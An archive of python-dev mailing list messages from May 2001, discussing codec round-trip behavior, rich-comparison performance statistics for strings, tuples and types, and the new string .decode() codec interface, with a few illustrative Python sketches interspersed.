> Since I don't yet use any of this stuff for real, I have no idea:  seems
> mostly a question of pragmatics, and I don't have any feel for how cp875
> users would view it.

If there are any... that code page dates back to 1996 and is
based in the EBCDIC world.
 
> > Here are some more options:
> >
> > * sort the items before creating the encoding table from the
> >   decoding one (makes the mapping stable)
> 
> If users don't care that round-trip can fail silently, fine.
> 
> > * map keys which have multiple mappings in the encoding table
> >   to None -- this causes their usage to raise an exception
> >   (undefined mapping)
> 
> If users don't care that they'll get an exception when they try something
> that can't be round-tripped, fine.  Or would this depend on the value of the
> "errors" argument too?  Then it's easier to impose.

The errors argument tells the codecs what to do in case a mapping
fails (from codecs.py):

        The .encode()/.decode() methods may implement different error
        handling schemes by providing the errors argument. These
        string values are defined:

         'strict' - raise a ValueError error (or a subclass)
         'ignore' - ignore the character and continue with the next
         'replace' - replace with a suitable replacement character;
                    Python will use the official U+FFFD REPLACEMENT
                    CHARACTER for the builtin Unicode codecs.

'strict' is the default for all operations that deal with auto-
conversion. 'ignore' and 'replace' allow silently ignoring the
problem.
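
The "map ambiguous keys to None" option combined with the errors argument can be sketched in Python 3 as follows. The table, the helper names and the `"toy"` encoding name are hypothetical; the sketch only illustrates how 'strict', 'ignore' and 'replace' would treat a character that has several byte mappings. Sorting while inverting also gives the stable result of the first option.

```python
from collections import Counter
from typing import Dict, Optional


def invert_decoding_table(decoding: Dict[int, str]) -> Dict[str, Optional[int]]:
    """Build an encoding map; characters reachable from several bytes get None."""
    counts = Counter(decoding.values())
    encoding: Dict[str, Optional[int]] = {}
    for byte in sorted(decoding):            # sorted() keeps the result stable
        ch = decoding[byte]
        encoding[ch] = None if counts[ch] > 1 else byte
    return encoding


def encode(text: str, table: Dict[str, Optional[int]], errors: str = "strict") -> bytes:
    out = bytearray()
    for i, ch in enumerate(text):
        byte = table.get(ch)                 # None: unmapped or ambiguous
        if byte is not None:
            out.append(byte)
        elif errors == "strict":
            raise UnicodeEncodeError("toy", text, i, i + 1, "undefined mapping")
        elif errors == "replace":
            out += b"?"
        elif errors != "ignore":
            raise ValueError(f"unknown error handler {errors!r}")
    return bytes(out)


# Hypothetical table in which both 0x42 and 0x5A decode to "B".
DECODING = {0x41: "A", 0x42: "B", 0x5A: "B"}
ENCODING = invert_decoding_table(DECODING)
```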
 
> There's a theme here <wink>:  I have no idea how important roundtrip is in
> Unicode Practice, or even that it's a constant across apps and encodings.  If
> I write a codec to map all ASCII consonants to u"k" and vowels to u"a",  I
> wouldn't care that I can't get "love" back from u"kaka" <wink>.

Round-tripping is obviously very important if you use Unicode
as basis for working on text. I don't know about the reasoning
behind making cp875 fail the round-trip -- Unicode certainly
provides means to make mappings round-trip safe (e.g. by reverting
to Unicode's Private Use Area code points).
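
One way to make a many-to-one decoding table round-trip safe, along the lines Marc-Andre mentions, is to move every duplicate onto its own Private Use Area code point. The `U+E000 + byte` scheme below is a hypothetical choice for illustration and assumes the table does not already use those code points.

```python
from typing import Dict

PUA_START = 0xE000  # first code point of the BMP Private Use Area


def make_roundtrip_safe(decoding: Dict[int, str]) -> Dict[int, str]:
    """Give every byte a distinct character so the table can be inverted."""
    seen = set()
    safe: Dict[int, str] = {}
    for byte in sorted(decoding):
        ch = decoding[byte]
        if ch in seen:                       # duplicate: park it in the PUA
            ch = chr(PUA_START + byte)
        seen.add(ch)
        safe[byte] = ch
    return safe


DECODING = {0x41: "A", 0x42: "B", 0x5A: "B"}
SAFE = make_roundtrip_safe(DECODING)
ENCODING = {ch: byte for byte, ch in SAFE.items()}  # now one-to-one
```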

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Tue May 15 11:26:32 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 05:26:32 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>

[Martin v. Loewis]
> Is this really exactly what Python would guarantee? I'm surprised that
> x==x would always be true, but x!=x might be true also. In a type where
> x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
> I had expected that you'd reduced it to
>
>   if (v == w && op == Py_EQ) /* then return Py_True */
>   if (v == w && op == Py_NE) /* then return Py_False */

I agree that would be more analogous to what PyObject_Compare() does.

I'm not sure either makes sense for rich comparisons; for example, under
IEEE-754 rules, a NaN must compare not-equal to everything, including
itself(!), and richcmps are the only hope Python users have of modeling that.
Doing those pointer checks before giving richcmps a chance would kill that
hope.  Can we agree to drop this one until somebody produces stats saying
it's important?  I have no reason to suspect that it is.
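
Tim's NaN point is easy to check in present-day Python 3. `==` on floats follows IEEE-754, while CPython's container membership test (`in`) checks identity before calling `==`, so the two can disagree for the very same NaN object. This describes current CPython behavior, not anything decided in this thread.

```python
import math

nan = float("nan")
assert math.isnan(nan)
assert nan != nan and not (nan == nan)   # IEEE-754: NaN is unequal even to itself

# Membership tests in CPython check identity first, then fall back to ==.
assert nan in [nan]                      # same object: found via identity
assert float("nan") not in [nan]         # different NaN object: == says no
```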

> The one application where this may help is list_contains, in
> particular when searching a list of interned strings.

string_compare() could special-case pointer equality too, although I suspect
doing so would be a net loss.

> Please have a look at the patch below.

I will, but not tonight anymore -- it's been a very long day.

> ...
> I agree "in principle" :-) However, you cannot move the case "equal
> types, implementing tp_compare" before the case "one of them
> implements tp_richcompare" without changing the semantics.

Of course.  But except for instance objects, answering "does the type
implement tp_richcompare?" is one lousy pointer check, and the answer will
usually be-- provided we don't start stuffing code into *every* object's
tp_richcompare slot! --"no, so I can go to tp_compare immediately".
Coercions and richcmps are the oddball cases today.

> The change here is what you'd do when you have both richcmp and
> oldcomp; Python clearly mandates using richcmp.

Yes, except you don't usually have both today and reality is exploitable
<wink>.

> In case this is not obvious (it wasn't to me): UserList will complain
> about using the deprecated __cmp__,

Sounds like a bug to me; if cmp is deprecated, that's also news to me.

> and dictionaries will iterate over their elements differently.

dicts didn't have a tp_richcompare slot before I added it last week, and
because dicts can do a much faster and more-general job on Py_EQ and Py_NE
than dict cmp (but on nothing else).  I originally took away the tp_compare
slot for dicts and lived to regret it -- it has both now.

> Given that richcomp has to be tried first, this patch does the "common
> case" at the earliest possible time, and with no overhead, except for
> PyErr_Occurred call.

The earliest *reasonable* time would be after a short block of new pointer
checks while still inside PyObject_RichCompare():  I believe the usual case
today is that the objects are of the same type, the type doesn't have a
tp_richcompare slot, but does have a tp_compare slot.  This covers at least
ints, floats, longs and strings, where the overhead of a single function call
is most often larger than the time it actually takes to compare the darned
things.  It's not important to, e.g., get to a dict comparison quickly,
because comparing dicts is darned expensive even after we find the dict
comparison routine.  Ditto comparing instances or matrices etc.  Optimizing
for richcmps is optimizing the less important thing.

BTW, tuples have a richcompare slot today and it's unclear that's a good
idea.  They do the same kind of Py_EQ/Py_NE "length check" you like for
strings, and I'd be surprised if that didn't cost more than it saves.  Unlike
strings, whenever I compare tuples they *always* have the same size (e.g.,
think of all the decorator pattern ways tuples are used to augment sorts).

OK, across a full run of the test suite, tuplerichcompare() was called about
162000 times, all but about 50 times with Py_EQ or Py_NE.  The number of
times this code block at the start bore fruit:

	if (vt->ob_size != wt->ob_size && (op == Py_EQ || op == Py_NE)) {
		/* Shortcut: if the lengths differ, the tuples differ */
		PyObject *res;
		if (op == Py_EQ)
			res = Py_False;
		else
			res = Py_True;
		Py_INCREF(res);
		return res;
	}

was 0 -- the tuples were always the same size for Py_EQ/Py_NE, and the code
just burned cycles.  I want to move toward optimizations that save more than
they cost <0.7 wink>.
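
Tim's measurement can be mimicked with an instrumented Python 3 sketch. `tuple_eq` is a hypothetical helper that counts how often the length shortcut fires; with decorated sort keys of a fixed shape it never does.

```python
from collections import Counter


def tuple_eq(v: tuple, w: tuple, stats: Counter) -> bool:
    """Tuple equality with an instrumented length shortcut."""
    stats["calls"] += 1
    if len(v) != len(w):
        stats["length_shortcut"] += 1      # the only case the shortcut helps
        return False
    for a, b in zip(v, w):
        if not (a is b or a == b):         # identity first, as modern CPython does
            return False
    return True


# Decorated sort keys all have the same length, so the shortcut never fires.
stats = Counter()
keys = [(len(s), s) for s in ["pear", "fig", "apple", "fig"]]
matches = sum(tuple_eq(a, b, stats) for a in keys for b in keys)
```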

> ...
> For strings, I would still special-case tp_richcompare: when tracing
> calls to string_richcompare, I found that most calls with Py_EQ can
> be decided by checking that the string lengths are not equal.

I expect you'd also find that the current string_compare() usually decides
they're not equal on the first character comparison (which *it*
special-cases).  So special-casing on length isn't a clear win over what's
already done.  But, if it is, bravo!  Special-case the snot out of it without
calling *any* string functions (merely calling string_richcompare likely
costs a good deal more than comparing the lengths).

more-measuring-less-guessing-ly y'rs  - tim


From thomas at xs4all.net  Tue May 15 13:51:06 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 15 May 2001 13:51:06 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <200105150426.f4F4QVx01531@localhost.local>; from uche.ogbuji@fourthought.com on Mon, May 14, 2001 at 10:26:31PM -0600
References: <tim.one@home.com> <200105150426.f4F4QVx01531@localhost.local>
Message-ID: <20010515135106.A16811@xs4all.nl>

On Mon, May 14, 2001 at 10:26:31PM -0600, Uche Ogbuji wrote:

> I thought I was the only one getting all these silly Nigerian scam spams.  I 
> figured maybe they saw my name and decided to test on me (though they might 
> more cleverly have figured that a fellow Nigerian would be wise to the game).

Actually, one of my colleagues informed me that this spam is in fact *very
old* (after I ROTFL'd rather loudly reading the Dilbert comic featuring the
Nigerian spam a mere week after getting the spam myself :) Scott (my
colleague, not Adams) remembers first getting it by fax, 15 years ago, and
again several years later. And not just one fax, but every single fax in the
company, and lots more outside of the company. Apparently the telephone
operator issued a warning to all customers not to respond to the fax.

Still-sound-advice-ly y'rs,

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Tue May 15 14:10:16 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 14:10:16 +0200
Subject: [Python-Dev] Easy codec access
Message-ID: <3B011CA8.9DDB4FC7@lemburg.com>

I've just checked in a set of patches which implement the new
.decode() method along with a couple of useful codecs.

You can now do things like these:

>>> "abc".encode('zlib').encode('base64')
'eJxLTEoGAAJNASc=\n'
>>> _.decode('base64').decode('zlib')
'abc'

>>> "abcäöü".decode('latin-1')
u'abc\xe4\xf6\xfc'

>>> "abcäöü".decode('latin-1').encode('latin-1')
'abc\xe4\xf6\xfc'

>>> "Hello World !".encode('rot13')
'Uryyb Jbeyq !'

So the overall codec experience should be a much better one
now.
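
For readers on Python 3: `str.decode` no longer exists there, and bytes-to-bytes transforms such as zlib and base64 are reached through `codecs.encode()`/`codecs.decode()` rather than through `.encode()` on a string. A sketch of the same examples in that style:

```python
import codecs

# zlib then base64, and back again (both are bytes-to-bytes codecs).
packed = codecs.encode(codecs.encode(b"abc", "zlib"), "base64")
assert codecs.decode(codecs.decode(packed, "base64"), "zlib") == b"abc"

# Latin-1 text codec in both directions.
assert b"abc\xe4\xf6\xfc".decode("latin-1") == "abc\u00e4\u00f6\u00fc"
assert "abc\u00e4\u00f6\u00fc".encode("latin-1") == b"abc\xe4\xf6\xfc"

# rot13 is a str-to-str transform.
assert codecs.encode("Hello World !", "rot13") == "Uryyb Jbeyq !"
```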

To see just how easy it is to write codecs, please have
a look at the string codecs I added in this patch (e.g.
zlib_codec.py or hex_codec.py). I am pretty sure that there
are a lot more useful things in the standard lib which could
benefit from these easy-to-use interfaces.
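
To illustrate how little code a codec needs, here is a Python 3 sketch that registers one through a `codecs.register` search function. The codec name `toyhex` and its functions are hypothetical and exist only for this example; the standard library already ships a real `hex` codec.

```python
import codecs


def _search(name):
    if name != "toyhex":                 # hypothetical codec name
        return None

    def encode(data, errors="strict"):
        # Return (output, number of input items consumed).
        return bytes(data).hex().encode("ascii"), len(data)

    def decode(data, errors="strict"):
        return bytes.fromhex(bytes(data).decode("ascii")), len(data)

    return codecs.CodecInfo(encode, decode, name="toyhex")


codecs.register(_search)
```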

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at pythonware.com  Tue May 15 14:11:26 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Tue, 15 May 2001 14:11:26 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
References: <tim.one@home.com> <200105150426.f4F4QVx01531@localhost.local> <20010515135106.A16811@xs4all.nl>
Message-ID: <005701c0dd38$2f417560$0900a8c0@spiff>

thomas wrote:

> Actually, one of my colleagues informed me that this spam is in fact
> *very old*

more info here:

http://home.rica.net/alphae/419coal/index.htm

    "A Five Billion US$ (as of 1996, much more now) worldwide
    Scam which has run since the early 1980's under Successive
    Governments of Nigeria.

    "The Nigerian Scam is, according to published reports, the
    Third to Fifth largest industry in Nigeria."

Cheers /F (highest offer this far: $155,000,000)


From guido at digicool.com  Tue May 15 17:27:31 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 10:27:31 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Tue, 15 May 2001 05:26:32 -0400."
             <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com> 
Message-ID: <200105151527.KAA28734@cj20424-a.reston1.va.home.com>

> [Martin v. Loewis]
> > Is this really exactly what Python would guarantee? I'm surprised that
> > x==x would always be true, but x!=x might be true also. In a type where
> > x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
> > I had expected that you'd reduced it to
> >
> >   if (v == w && op == Py_EQ) /* then return Py_True */
> >   if (v == w && op == Py_NE) /* then return Py_False */

[Tim]
> I agree that would be more analogous to what PyObject_Compare() does.
> 
> I'm not sure either makes sense for rich comparisons; for example, under
> IEEE-754 rules, a NaN must compare not-equal to everything, including
> itself(!), and richcmps are the only hope Python users have of modeling that.
> Doing those pointer checks before giving richcmps a chance would kill that
> hope.  Can we agree to drop this one until somebody produces stats saying
> it's important?  I have no reason to suspect that it is.

PEP 207 is quite explicit that == and != are not to be assumed each
other's complement.  It is silent on the x==x issue but the PEP
mentions IEEE 754 so I agree that this also shouldn't be cut short.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake at acm.org  Tue May 15 17:29:10 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 15 May 2001 11:29:10 -0400 (EDT)
Subject: [Python-Dev] Unicode docs
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
References: <3AFFA23F.248517E3@lemburg.com>
	<LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
Message-ID: <15105.19270.62890.240534@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > The latter addresses several *fundamental* questions untouched by
 > the former, like what are the datatypes of the arguments and the
 > result, what values does errors accept, and what do they mean?  The
 > first blurb answers some more, like what's the default encoding,
 > and which exception is raised?  Neither is complete on its own, but
 > the reference manual should have a complete answer to all such
 > questions.  It doesn't have to go on at great length.

  I've beefed up the description of the unicode() function by merging
the information from AMK's document.

 > A round-trip example would be invaluable.
 > 
 > If Fred wanted to incorporate a brief overview too, a light rework of
 > Andrew/Moshe's writeup would be an excellent start.

  I'd love to have a contribution from someone with more knowledge of
what's there than me.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From guido at digicool.com  Tue May 15 18:35:09 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 11:35:09 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: Your message of "Tue, 15 May 2001 14:10:16 +0200."
             <3B011CA8.9DDB4FC7@lemburg.com> 
References: <3B011CA8.9DDB4FC7@lemburg.com> 
Message-ID: <200105151635.LAA29530@cj20424-a.reston1.va.home.com>

> I've just checked in a set of patches which implement the new
> .decode() method along with a couple of useful codecs.

Cool!

> To see just how easy it is to write codecs, please have
> a look at the string codecs I added in this patch (e.g.
> zlib_codec.py or hex_codec.py). I am pretty sure that there
> are a lot more useful things in the standard lib which could
> benefit from these easy-to-use interfaces.

As an exercise, I added a quoted-printable codec.  It was easy
indeed!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at effbot.org  Tue May 15 20:21:00 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Tue, 15 May 2001 20:21:00 +0200
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
Message-ID: <000901c0dd6b$cdb5d960$e46940d5@hagrid>

in case anyone has two hours to spare, and the right software,
MIT's dynamic languages group has posted a quicktime video of
their recent panel on language design.

http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html

(what 1/2 should result in, why it's good to have both CPython
and JPython, why whitespace is significant, why language design
is perhaps more related to architecture than math, and lots of
other goodies from Guy Steele and others)

Cheers /F


From nas at python.ca  Tue May 15 20:51:20 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 15 May 2001 11:51:20 -0700
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
In-Reply-To: <000901c0dd6b$cdb5d960$e46940d5@hagrid>; from fredrik@effbot.org on Tue, May 15, 2001 at 08:21:00PM +0200
References: <000901c0dd6b$cdb5d960$e46940d5@hagrid>
Message-ID: <20010515115120.A14357@glacier.fnational.com>

Fredrik Lundh wrote:
> in case anyone has two hours to spare, and the right software,
> MIT's dynamic languages group has posted a quicktime video of
> their recent panel on language design.
> 
> http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html

Does the streaming actually work for anyone?  I've given up and
started downloading the whole .mov files.

  Neil


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 21:45:59 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 21:45:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>

> more-measuring-less-guessing-ly y'rs  - tim

Producing numbers is easy :-) I've instrumented my version where
string implements richcmp, and special-cases everything I can think
of. Counting is done for running the test suite. With this, I get

Calls to string_richcompare:   2378660
Calls with different types:      33992 (ie. one is not a string)
Calls with identical strings:   120517
Calls where lens decide !EQ:   1775716
----------------------------
Calls richcmp -> oldcomp:       448435
Total calls to oldcomp:        1225643
Calls oldcomp -> memcmp:        860174

So 5% of the calls are with identical strings, for which I can
immediately decide the outcome. 75% can be decided in terms of the
string lengths, which leaves ca. 19% for cases where lexicographical
comparison is needed.
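
The percentages above follow directly from the first table; a small Python 3 check, using only the counts Martin reported:

```python
calls = 2378660                           # calls to string_richcompare
decided = {
    "different types": 33992,
    "identical strings": 120517,
    "lengths decide !EQ": 1775716,
}
shares = {name: n / calls for name, n in decided.items()}
needs_lexicographic = 1 - sum(shares.values())   # falls through to oldcomp
first_byte_decides = 1 - 860174 / 1225643        # oldcomp calls avoiding memcmp

for name, share in shares.items():
    print(f"{name:>20}: {share:6.1%}")
print(f"{'lexicographic':>20}: {needs_lexicographic:6.1%}")
print(f"{'first byte decides':>20}: {first_byte_decides:6.1%}")
```

The leftover count, `calls - sum(decided.values())`, equals the 448435 "richcmp -> oldcomp" calls in the table.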

In those cases, the first byte decides in 30%. If I remove the test
for "len decides !EQ", I get

#riches:                       2358322
#riches_ni:                      34108
#idents_decide:                 102050
#lens_decide:                        0
--------------------------------------
rest(computed):                2222164
#comps:                        2949421
#memcmps:                       917776

So still, ca. 30% can be decided by first byte. It still appears that
the total number of calls to memcmp is higher when the length is not
taken into consideration. To verify this claim, I've counted the cases
where the length decides the outcome, but looking at the first byte
also had:

lens_decide:                    1784897
lens_decide_firstbyte_wouldhave:1671148

So in 6% of the cases, checking the length alone gives a decision
which looking at the first byte doesn't; plus it saves a function
call.

To support the thesis that Py_EQ is the common case for strings, I
counted the various operations:

pyEQ:2271593
pyLE:9234
pyGE:0
pyNE:20470
pyLT:22765
pyGT:578

Now, that might be flawed since comparing strings for equality is
extremely frequent in the testsuite. To give more credibility to the
data, I also ran setup.py with my instrumented ./python:

riches:21640
riches_ni:76
riches_ni1:0
idents:2885
idents_decide:2885
lens_decide:9472
lens_decide_firstbyte_wouldhave:6223
comps:26360
memcmps:19224
pyEQ:20093
pyLE:46
pyGE:1
pyNE:548
pyLT:876
pyGT:0

That shows that optimizing for Py_NE is not worth it. With these data,
I'll upload a patch to SF.

Regards,
Martin


From tim at digicool.com  Tue May 15 22:22:37 2001
From: tim at digicool.com (Tim Peters)
Date: Tue, 15 May 2001 16:22:37 -0400
Subject: [Python-Dev] Comparison corner case
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEINCAAA.tim@digicool.com>

Here's the tail end of a patch comment.  If you believe the illustrated
behavior is wrong, then I don't believe we gain anything from using the
tp_richcmp slot for tuples for anything other than EQ/NE testing (the gain
for the latter is that it allows EQ/NE tuple comparison to work correctly on
tuples containing elements that support only EQ/NE comparisons):

"""
BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
because it won't believe there's any difference unless Py_EQ returns false
for some corresponding elements:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> C() < C()
1
>>> (C(),) < (C(),)
0
>>>

That doesn't make sense -- provided you believe the defn. of C makes sense.
"""
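
The same behavior can still be reproduced in Python 3, since tuples still look for the first pair that is not `==` before applying `<`. A minimal sketch with Tim's class:

```python
class C:
    def __lt__(self, other):
        return True
    __eq__ = __lt__          # every C claims to be both equal and less


assert (C() < C()) is True
# Items compare equal, so the tuples are ordered by length: 1 < 1 is False.
assert ((C(),) < (C(),)) is False
```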


From guido at digicool.com  Tue May 15 23:36:57 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 16:36:57 -0500
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: Your message of "Tue, 15 May 2001 13:13:01 MST."
             <E14zlBl-0004pj-00@usw-pr-cvs1.sourceforge.net> 
References: <E14zlBl-0004pj-00@usw-pr-cvs1.sourceforge.net> 
Message-ID: <200105152136.QAA00489@cj20424-a.reston1.va.home.com>

Tim wrote:
> BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
> because it won't believe there's any difference unless Py_EQ returns false
> for some corresponding elements:
> 
> >>> class C:
> ...     def __lt__(x, y): return 1
> ...     __eq__ = __lt__
> ...
> >>> C() < C()
> 1
> >>> (C(),) < (C(),)
> 0
> >>>
> 
> That doesn't make sense -- provided you believe the defn. of C makes sense.

I think in this example the problem is with C, not with the tuple
algorithm.  The question is, what are you going to do otherwise?  You
could test for < first, == second -- but that means twice as many
comparisons, and for reasonably-behaved items it makes no difference
at all.
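
Guido's trade-off can be made concrete with two hypothetical Python 3 helpers. `lex_lt` follows the strategy described in the thread (find the first pair that is not `==`, then apply `<` once); `lex_lt_alt` asks `<` and then `==` at every position. The counter shows the alternative doing up to twice as many item comparisons on equal prefixes, while giving the same answers for well-behaved items.

```python
def lex_lt(v, w, count):
    """Tuple-style '<': find the first unequal pair with ==, then apply < once."""
    for a, b in zip(v, w):
        count[0] += 1
        if not a == b:
            count[0] += 1
            return a < b
    return len(v) < len(w)


def lex_lt_alt(v, w, count):
    """Alternative: test '<' then '==' at each position."""
    for a, b in zip(v, w):
        count[0] += 1
        if a < b:
            return True
        count[0] += 1
        if not a == b:
            return False
    return len(v) < len(w)
```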

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 22:59:56 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 22:59:56 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>

> Of course.  But except for instance objects, answering "does the type
> implement tp_richcompare?" is one lousy pointer check

Almost - you also have to check the type flag.

> and the answer will usually be-- provided we don't start stuffing
> code into *every* object's tp_richcompare slot! --"no, so I can go
> to tp_compare immediately".  Coercions and richcmps are the oddball
> cases today.

I'd like to add another data point, answering the question what types
are most frequently compared. The first set of data is for running the
Python testsuite.

riches      3040952  # Calls to PyType_RichCompare
eqs         2828345  # Calls where the types are equal

String      2323122
Float        141507
Int          125187
Type          99477
Tuple         84503
Long          30325
Unicode       10782
Instance       9335
List           2997
None            383
Class           318
Complex         219
Dict             57
Array            49
WeakRef          34
Function         11
File             11
SRE_Pattern      10
CFunction         9
Lock              8
Module            1

So strings cover 82% of all the compare calls between equally-typed
objects, followed by floats with 5%. The equally-typed calls themselves
make up 93% of all richcompare calls.
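The percentages can be re-derived from the table with a little arithmetic. This sketch uses only the counts quoted above.

```python
# Counts taken from the testsuite table above.
riches = 3040952   # all rich comparisons
eqs = 2828345      # calls where both operands have the same type
strings = 2323122
floats = 141507

def percent(part, whole):
    """Share of `whole` made up by `part`, rounded to a whole percent."""
    return round(100 * part / whole)

print(percent(strings, eqs))   # 82  (strings among same-type calls)
print(percent(floats, eqs))    # 5   (floats among same-type calls)
print(percent(eqs, riches))    # 93  (same-type calls among all calls)
```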

Since this might give a blurred view of what is actually used in
applications, I ran the PyXML testsuite with that python binary
also. Leaving out types that are not used, I get

riches        88465
eqs           59279

String        48097
Int            5681
Type           3170
Tuple           760
List            492
Float           332
Instance        269
Unicode         243
None            225
SRE_Pattern       4
Long              3
Complex           3

The first observation here is that "only" 67% of the calls are with
equally-typed objects. Of those, 80% are with strings, 9% with
integers.

The last example is IDLE, where I just did an "import httplib", for
fun.

riches        50923
eqs           49882

String        31198
Tuple          8312
Type           7978
Int            1456
None            600
SRE_Pattern     210
List            122
Instance          4
Float             1
Instance method   1

Roughly the same picture: 97% of the calls are with equally-typed
objects; of those, 62% are with strings and 3% with integers. Notice
the 15% each for tuples and types.

So speeding up the common case clearly means speeding up string
comparisons. If I needed to optimize anything else afterwards, I'd
look into type objects - most likely, they are compared for EQ, which
can be done nicely and directly in a tp_richcompare also.

Those two optimizations together would give a richcompare to 95% of
the objects in the IDLE case.

Regards,
Martin


From guido at digicool.com  Wed May 16 00:41:12 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 17:41:12 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Tue, 15 May 2001 22:59:56 +0200."
             <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>  
            <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> 
Message-ID: <200105152241.RAA00926@cj20424-a.reston1.va.home.com>

I'm curious where the frequent comparisons of types come from.

Is there lots of code that does frequent

    assert type(x) == T

typechecking?

Does isinstance(x, T) perhaps use EQ?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry at digicool.com  Tue May 15 23:51:00 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Tue, 15 May 2001 17:51:00 -0400
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com>
Message-ID: <15105.42180.401918.223487@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> I'm curious where the frequent comparisons of types come
    GvR> from.

    GvR> Is there lots of code that does frequent

    GvR>     assert type(x) == T

    GvR> typechecking?

    GvR> Does isinstance(x, T) perhaps use EQ?

Not to mention the several hundred comparisons to None.


From jeremy at digicool.com  Tue May 15 19:26:54 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Tue, 15 May 2001 13:26:54 -0400 (EDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com>
Message-ID: <15105.26334.610144.846269@slothrop.digicool.com>

I only learned recently that isinstance() can be called with types
instead of classes.  I suppose the name led me in the wrong
direction.  I had the silly idea that it only applied to instances
<0.1 wink>.

So it comes as little surprise to me that there is a lot of code
executed in, e.g., the test suite that does comparisons on types.

In the Lib directory, there are 63 files that use == and the builtin
type function.  (Simple grep.)  A total of 139 instances of this
idiom.  A cursory scan suggests that most of the calls are things like
type(obj) == type('').

In the Zope source tree, there are 58 files and 98 individual
occurrences.  It again looks like comparisons against the string type
are the most common.

I can think of two common cases where an object is checked against the
string type.  One is an interface that takes a file-like object or its
path.  The other is an interface that takes a sequence, but doesn't
want to try a string as a sequence.

Sounds like we ought to do a search-and-destroy on type comparisons,
replacing with isinstance() where possible.
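The replacement is not purely mechanical once built-in types can be subclassed, as they can in modern Python. isinstance() accepts subclasses, while an exact type test rejects them. This is a Python 3 sketch: `str` stands in for `types.StringType`, and `Name` is a hypothetical subclass.

```python
class Name(str):
    """Hypothetical str subclass, standing in for any user-defined string type."""

s = Name("spam")

# Old idiom: exact type equality rejects the subclass.
print(type(s) == type(""))    # False
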